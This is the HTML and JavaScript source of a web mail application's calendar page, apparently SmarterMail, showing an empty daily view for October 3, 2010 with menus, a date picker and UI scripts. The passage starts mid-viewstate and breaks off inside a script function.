dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAhATW9udGhseQH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAoLZAUcY3RsMDAkTVBIJGNhbEFsbCRncmRBbGxBcHB0cw8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGRue/fFwljYXQz9Ptb7gAnGzSz6HQ==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQcUaVolINSsSmd45xIt6vT0&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWR9MeV9ZUBGsbQORxp8pY6I0fjnZzGUp1Vh7LOm8VmDBQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1PWslctYv3SyMb4XUFYFVUAUmpHu3v1jth73Pi-k7Mak1&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1o6y_K2I5aF0r3HOKggytHw2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="../Services/svcSuperHyperGrid.asmx/js" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$TitleBar$UpdatePanel2','tctl00$BPH$ctl00','tctl00$UpdatePanel1','tctl00$TPH$UpdatePanel1','tctl00$MPH$ctl00','tctl00$CntPH$UpdatePanel3'], ['ctl00$TitleBar$menuCalendarSourceTitle','ctl00$TPH$lnkTabSelector','ctl00$BPH$btnDelete','ctl00$BPH$btnEdit','ctl00$MPH$rightClickMenu','ctl00$BrPH$searchBar$btnGo','ctl00$BrPH$searchBar$btnClear'], [], 90);
//]]>
</script>

       
   <div id="ctl00_TitleBar_UpdatePanel2">
   
           <div class="PageTitle" id="SectionHeader">
               <div class="RoundedPageTitleLeft">
                   
<!-- HyperMenu -->
   <div class='hmNavMenu'><ul class='hmMenu hmNavMenu hmList' id='ctl00_TitleBar_menuCalendarSourceTitle' name='ctl00$TitleBar$menuCalendarSourceTitle' style='z-index:1002'>
       <li class='hmItem hmFirst hmLast' id='ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource' style='z-index: 1002'><a class='hmA hmHasChildren' href='#'>My Calendar<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource_menuSourceSelf' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource_menuSourceSelf_CB' group='source' type='checkbox'checked='checked'></div>My Calendar</a></li>
           <li class='hmSeperator' style='z-index:1002'><span><!-- --></span></li>
           <li class='hmItem hmLast' id='ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource_menuSourceManage' style='z-index: 1002'><a class='hmA' href='#'>Mapped Resources</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
   </ul>
   </div>
   
               </div>
           </div>
       
</div>

       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_ctl00">
   
           
<!-- HyperMenu -->
   <div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_BPH_menuCalendar' name='ctl00$BPH$menuCalendar' style='z-index:800'>
       <li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuGlobalNew' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>New<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuGlobalNew_b4e4ec7cf4a64e049e3bfd8f4df55825' style='z-index: 800'><a class='hmA' href='#'>New Message</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_b5a5250bcdca48709b0e116ff7243519' style='z-index: 800'><a class='hmA' href='#'>New Contact</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_b1ad3d6c053c4d92a5ac8c03dca4a703' style='z-index: 800'><a class='hmA' href='#'>New Appointment</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_d6ecd73ff32f4cc48bbb81f7c18cb647' style='z-index: 800'><a class='hmA' href='#'>New Task</a></li>
           <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuGlobalNew_ff2ab4b2477646cf8a90669ada6e87e5' style='z-index: 800'><a class='hmA' href='#'>New Note</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem' id='ctl00_BPH_menuCalendar_menuCalendarActions' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst hmLast' id='ctl00_BPH_menuCalendar_menuCalendarActions_menuAddToOutlook' style='z-index: 800'><a class='hmA' href='#'>Add to Outlook</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuCalView' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
           <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
               <li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterRecurring' style='z-index: 800'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterRecurring_CB' group='' type='checkbox'checked='checked'></div>Recurring</a></li>
               <li class='hmItem hmCheckable hmChecked' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterAllDay' style='z-index: 800'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterAllDay_CB' group='' type='checkbox'checked='checked'></div>All Day</a></li>
               <li class='hmSeperator' style='z-index:800'><span><!-- --></span></li>
               <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterClear' style='z-index: 800'><a class='hmA' href='#'>Reset Filter</a></li>
           </ul><div class='hmScrollDown'></div></div>
           </li>
           <li class='hmSeperator' style='z-index:800'><span><!-- --></span></li>
           <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuCalView_menuColumns' style='z-index: 800'><a class='hmA' href='#'>Visible Fields</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
   </ul>
   </div>
   
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="DoPrint();; return false;"><span class="BBInner">Print</span></a></div>
       
</div>
   <div style="display: none">
       <div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>
       <div id="ctl00_BPH_btnEdit" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEdit(); return false;"><span class="BBInner">Edit</span></a></div>
   </div>

           </div>
           <div class="ButtonBarRight">
               
   
<div id="FilterBarContents" class="RoundedSearchBox">
   <div class="RoundedSearchBoxLeft">
       <div class="RoundedSearchBoxRight">
           <label for="ctl00_BrPH_searchBar_FilterBox" id="ctl00_BrPH_searchBar_FilterBoxLabel" style="display: none">Search...</label>
           <div id="ctl00_BrPH_searchBar_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$searchBar$btnGo',''); return false;"><span class="BBInner"></span></a></div>
           <input name="ctl00$BrPH$searchBar$FilterBox" type="text" id="ctl00_BrPH_searchBar_FilterBox" autocomplete="off" />
           <div id="ctl00_BrPH_searchBar_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$searchBar$btnClear',''); return false;"><span class="BBInner"></span></a></div>
       </div>
   </div>
</div>


   <script type="text/javascript">
var startup = function() {
$("#FilterBarContents").magicLabels();

$("#ctl00_BrPH_searchBar_FilterBox").keypress(function(event) {
if (event.keyCode == 13) {
__doPostBack('ctl00$BrPH$searchBar$btnGo','');
event.preventDefault();
}
});

$("#ctl00_BrPH_searchBar_btnClear").click(function() {
$("#ctl00_BrPH_searchBar_FilterBox").val('');
$("#FilterBarContents").magicLabels();
});
}
setTimeout(startup, 1);
   </script>




           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   <div id="ctl00_TPH_UpdatePanel1">
   
           
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_tsTabs'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_tsTabs_tabDaily'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Daily</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_tsTabs_tabWeekly'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Weekly</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_tsTabs_tabMonthly'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Monthly</span></span></a></li>
       <li class='htsItem htsLast' id='ctl00_TPH_tsTabs_tabAll'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>All Appointments</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$tsTabs$SelectedTab" id="ctl00_TPH_tsTabs_SelectedTab" value="ctl00_TPH_tsTabs_tabDaily" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
           <a id="ctl00_TPH_lnkTabSelector" href="javascript:__doPostBack('ctl00$TPH$lnkTabSelector','')"></a>
       
</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask=Specific/frmCalendar"></script>
   <div id="ctl00_MPH_ctl00">
   
           <div>
               <table id="ctl00_MPH_CalNavViewTable" class="CalNavViewTable">
       <tr>
           <td class="CalNavViewTableArrow">
                           <input type="image" name="ctl00$MPH$btnNavLeft" id="ctl00_MPH_btnNavLeft" src="/App_Themes/Default/Images/Misc/NavLeft.png" style="border-width:0px;" />
                       </td>
           <td class="CalNavViewTableArrow">
                           <input type="image" name="ctl00$MPH$btnNavRight" id="ctl00_MPH_btnNavRight" src="/App_Themes/Default/Images/Misc/NavRight.png" style="border-width:0px;" />
                       </td>
           <td class="CalNavViewTableText">
                           <span id="ctl00_MPH_lblDisplayText">Sunday, October 03, 2010</span>
                       </td>
           <td class="CalNavViewTableCal">
                           <input type="image" name="ctl00$MPH$btnCalPopup" id="ctl00_MPH_btnCalPopup" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" style="border-width:0px;" />
                       </td>
           <td class="CalNavViewTableToday">
                           <div id="ctl00_MPH_btnToday" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnToday',''); return false;"><span class="BBInner">Today</span></a></div>
                       </td>
       </tr>
   </table>
   
               
               <div style="clear: both">
               </div>
           </div>
           
           
<div id="CalendarViewScroll" style="overflow: auto; position: relative">
   <div id="CalendarView" class="CalendarView">
       <div id="ScrollingItemContainer" style="position: relative;">
           
           
                   <table id="tblDaily" class="DailyCalendarTable">
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=8&user=euser&mapped=false',600,500);">
                               8 AM</a>
                       </td>
                       <td id="tblDaily_Hour8" calhour="8" class="RightClickableNew DailyCalendarCellApptAlt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=9&user=euser&mapped=false',600,500);">
                               9 AM</a>
                       </td>
                       <td id="tblDaily_Hour9" calhour="9" class="RightClickableNew DailyCalendarCellAppt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=10&user=euser&mapped=false',600,500);">
                               10 AM</a>
                       </td>
                       <td id="tblDaily_Hour10" calhour="10" class="RightClickableNew DailyCalendarCellApptAlt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=11&user=euser&mapped=false',600,500);">
                               11 AM</a>
                       </td>
                       <td id="tblDaily_Hour11" calhour="11" class="RightClickableNew DailyCalendarCellAppt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=12&user=euser&mapped=false',600,500);">
                               12 PM</a>
                       </td>
                       <td id="tblDaily_Hour12" calhour="12" class="RightClickableNew DailyCalendarCellApptAlt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=13&user=euser&mapped=false',600,500);">
                               1 PM</a>
                       </td>
                       <td id="tblDaily_Hour13" calhour="13" class="RightClickableNew DailyCalendarCellAppt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=14&user=euser&mapped=false',600,500);">
                               2 PM</a>
                       </td>
                       <td id="tblDaily_Hour14" calhour="14" class="RightClickableNew DailyCalendarCellApptAlt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=15&user=euser&mapped=false',600,500);">
                               3 PM</a>
                       </td>
                       <td id="tblDaily_Hour15" calhour="15" class="RightClickableNew DailyCalendarCellAppt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=16&user=euser&mapped=false',600,500);">
                               4 PM</a>
                       </td>
                       <td id="tblDaily_Hour16" calhour="16" class="RightClickableNew DailyCalendarCellApptAlt">
                       </td>
                   </tr>
               
                   <tr>
                       <td class="DailyCalendarCellTime CalendarBusinessDay">
                           <a href='#' onclick="OpenNewMessage('/Main/Calendar/frmEvent.aspx?dt=10/03/2010&time=17&user=euser&mapped=false',600,500);">
                               5 PM</a>
                       </td>
                       <td id="tblDaily_Hour17" calhour="17" class="RightClickableNew DailyCalendarCellAppt">
                       </td>
                   </tr>
               
                   </table>
               
       </div>
   </div>
</div>


   <script type='text/javascript'>
       self.newApptUrl = "/Main/Calendar/frmEvent.aspx?dt=10/03/2010&user=euser&mapped=false";
       $('.RightClickableNew').each(function() {
           var cell = this;
           var hour = $(this).attr('calhour');
           cell.oncontextmenu = function(evt) {
               return ShowNewRightClick(evt || window.event, null, hour);
           }
       });
       document.customPrintJob = function() {
           $('.DailyCalendarTable').width(800);
           $("#ScrollingItemContainer").resizeDailyCalendarItems();
           PrintWindow();
           $('.DailyCalendarTable').css('width', '100%');
           $("#ScrollingItemContainer").resizeDailyCalendarItems();
       }
       document.SecondaryAdditionalResizeEvent = function() {
           $("#ScrollingItemContainer").resizeDailyCalendarItems();
       }
       document.DisposeEvent = function() {

       }
   </script>



           
           
           <div id="CalendarPopup" class="CalNavDatePicker">
               <div class="CalNavDatePickerInner">
                   <div class="CalNavDatePickerWrapper">
                       <div id="ctl00_MPH_calDatePicker_wrapper"><!-- 2010.2.817.35 --><table id="ctl00_MPH_calDatePicker" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
       <thead>
           <tr>
               <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                   <tr>
                       <td><a id="ctl00_MPH_calDatePicker_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_calDatePicker_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_calDatePicker_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_calDatePicker_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_calDatePicker_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                   </tr>
               </table></td>
           </tr>
       </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_calDatePicker_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_calDatePicker_Top_vs_0" class="rcViewSel"><img src="/App_Themes/Default/Images/misc/right2.gif" alt="x" /></th><th id="ctl00_MPH_calDatePicker_Top_cs_1" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_calDatePicker_Top_cs_2" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_calDatePicker_Top_cs_3" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_calDatePicker_Top_cs_4" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_calDatePicker_Top_cs_5" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_calDatePicker_Top_cs_6" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_calDatePicker_Top_cs_7" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <th id="ctl00_MPH_calDatePicker_Top_rs_1" scope="row"><img src="/App_Themes/Default/Images/misc/right.gif" alt="" /></th><td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <th id="ctl00_MPH_calDatePicker_Top_rs_2" scope="row"><img src="/App_Themes/Default/Images/misc/right.gif" alt="" /></th><td class="rcSelected" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <th id="ctl00_MPH_calDatePicker_Top_rs_3" scope="row"><img src="/App_Themes/Default/Images/misc/right.gif" alt="" /></th><td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <th id="ctl00_MPH_calDatePicker_Top_rs_4" scope="row"><img src="/App_Themes/Default/Images/misc/right.gif" alt="" /></th><td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <th id="ctl00_MPH_calDatePicker_Top_rs_5" scope="row"><img src="/App_Themes/Default/Images/misc/right.gif" alt="" /></th><td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <th id="ctl00_MPH_calDatePicker_Top_rs_6" scope="row"><img src="/App_Themes/Default/Images/misc/right.gif" alt="" /></th><td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
   </table><input type="hidden" name="ctl00_MPH_calDatePicker_SD" id="ctl00_MPH_calDatePicker_SD" value="[[2010,10,3]]" /><input type="hidden" name="ctl00_MPH_calDatePicker_AD" id="ctl00_MPH_calDatePicker_AD" value="[[1980,1,1],[2099,12,30],[2010,10,3]]" /></div>
                       <div id="ctl00_MPH_Button" class="CalendarPopupButtons">
                           <div class="ButtonBarRight">
                               <div id="ctl00_MPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGo',''); return false;"><span class="BBInner">OK</span></a></div>
                           </div>
                       </div>
                   </div>
               </div>
           </div>
           <div id="divDisposer" style="display: none">
           </div>
           <input type="hidden" name="ctl00$MPH$hfNewDate" id="ctl00_MPH_hfNewDate" />
           <a id="ctl00_MPH_lnkUpdate" href="javascript:__doPostBack('ctl00$MPH$lnkUpdate','')"></a>
       
</div>
   
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_rightClickMenu' name='ctl00$MPH$rightClickMenu' style='z-index:800'>
   <li class='hmItem hmFirst' id='ctl00_MPH_rightClickMenu_menuEdit' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
   <li class='hmItem hmLast' id='ctl00_MPH_rightClickMenu_menuDelete' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>

   
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_rightClickAddMenu' name='ctl00$MPH$rightClickAddMenu' style='z-index:800'>
   <li class='hmItem hmFirst hmLast' id='ctl00_MPH_rightClickAddMenu_menuNew' style='z-index: 800'><a class='hmA' href='#'>New</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>

   <input type="hidden" name="ctl00$MPH$MenuID" id="ctl00_MPH_MenuID" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
   <div id="ctl00_CntPH_UpdatePanel3">
   
           <span id="ctl00_CntPH_lblCount"></span>
       
</div>

           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/frmcalendar', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       var currentHeight = 0;
       document.AdditionalResizeEvent = function() {
           currentHeight = $('#Scrollable').innerHeight() - $('#ctl00_MPH_CalNavViewTable').outerHeight(true);
           $('#CalendarViewScroll').height(currentHeight);
           document.SecondaryAdditionalResizeEvent();
           document.SecondaryAdditionalResizeEvent();
       }
       function Initialize() {
           $get('divDisposer').dispose = function() {
               if (document.DisposeEvent) document.DisposeEvent();
               document.customPrintJob = null;
               document.DisposeEvent = null;
           };

           $('#ctl00_MPH_btnCalPopup').click(function(evt) {
               var table = $('#ctl00_MPH_CalNavViewTable');
               var tablePos = table.position();
               var popup = $('#CalendarPopup');
               tablePos.top += table.height();
               tablePos.left += table.width() - popup.width();
               popup.positionInsidePage(tablePos).css('display', 'block');
               return false;
           });
           //var arrow = $('#ctl00_TitleBar_menuCalendarSourceTitle a:first .hmArrow:first');
           //arrow.appendTo(arrow.parent().parent());
           $('#CalendarPopup').click(function(evt) { evt.stopImmediatePropagation(); });
           document.AdditionalResizeEvent();
       }
       function NewItem() {
           var url = self.newApptUrl;
           if (self.rightClickDate) url += "&dt=" + self.rightClickDate;
           if (self.rightClickTime) url += "&time=" + self.rightClickTime;
           OpenNewMessage(url, 600, 400);
           return false;
       }
       function OpenItem(uid, url) {
           uid = uid || $get('ctl00_MPH_MenuID').value;
           url = url || self.clickedUrl;
           OpenUniqueNewMessage(url, 600, 400, uid.replace(/[^a-zA-Z1-9]/g, ""));
       }
       function ShowRightClick(evt, id, url, isTask) {
           if (url == "") return;
           $get('ctl00_MPH_MenuID').value = (isTask ? "*task*" + id : id);
           self.clickedUrl = url;
           $('#ctl00_MPH_rightClickMenu').showHyperContextMenu(evt, null);
           return CancelEvent(evt);
       }
       function ShowNewRightClick(evt, date, time) {
           self.rightClickDate = date;
           self.rightClickTime = time;
           $('#ctl00_MPH_rightClickAddMenu').showHyperContextMenu(evt, null);
           return CancelEvent(evt);
       }
       function ViewDay(newDay) {
           $get('ctl00_MPH_hfNewDate').value = newDay;
           //
__doPostBack('ctl00$MPH$lnkUpdate','');
       }
       function DoubleClick(newUrl, uid, isNew) {
           OpenItem(uid, newUrl);
       }
       function ShowColumnSelector() {
           SpawnHyperWindow('/UserControls/Popups/frmGridSetup.aspx?type=calendar', 410, 320, UpdateGrid);
           return false;
       }
       function UpdateGrid() {//
__doPostBack('ctl00$MPH$lnkUpdate','');
       }
       document.UpdateOnVisible = UpdateGrid;
       $('#Scrollable').css('overflow', 'hidden');
       $(document).click(function() { $('#CalendarPopup').css('display', 'none'); });
       function SelectTab(kind) {
           __doPostBack('ctl00$TPH$lnkTabSelector', kind);
       }
       function OpenPopup(type, name, shareowner, calname) {
